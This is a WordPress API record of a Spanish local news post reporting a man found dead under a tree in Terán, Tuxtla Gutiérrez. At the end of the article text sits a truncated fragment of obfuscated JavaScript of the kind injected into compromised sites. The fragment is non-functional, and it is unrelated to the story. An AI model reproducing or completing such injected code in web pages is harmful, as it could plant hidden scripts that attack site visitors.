{"id":507,"date":"2022-03-11T21:47:40","date_gmt":"2022-03-11T21:47:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=507"},"modified":"2022-03-11T21:47:41","modified_gmt":"2022-03-11T21:47:41","slug":"muere-hombre-debajo-de-un-arbol-en-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=507","title":{"rendered":"Muere hombre debajo de un \u00e1rbol en Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220311-WA0032-1-1024x768.jpg\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220311-WA0032-1-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220311-WA0032-1-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220311-WA0032-1-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220311-WA0032-1.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 11 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de 37 a\u00f1os de edad perdi\u00f3 la vida este viernes por la tarde debajo de un \u00e1rbol, localizado en la Segunda Oriente y Sexta Sur de la delegaci\u00f3n Ter\u00e1n de Tuxtla.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, cerca de las 13 horas se report\u00f3 que el hombre que fue identificado como Manuel de 37 a\u00f1os de edad no respond\u00eda.<\/p>\n\n\n\n<p>Vecinos llamaron a los n\u00fameros de emergencias y fue valorado por param\u00e9dicos quienes determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>El hombre no presentaba heridas visibles y fue identificado por sus familiares, indicando que ten\u00eda su domicilio en la Ribera Guadalupe.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la FGE para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de rigor para determinar las causas concretas de la muerte.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 11 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de 37 a\u00f1os de edad perdi\u00f3 la vida este viernes por la tarde debajo de un \u00e1rbol, localizado en la Segunda Oriente y Sexta Sur de la delegaci\u00f3n Ter\u00e1n de Tuxtla. De acuerdo con los reportes oficiales, cerca de las 13 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":508,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-507","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=507"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/507\/revisions"}],"predecessor-version":[{"id":509,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/507\/revisions\/509"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/508"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}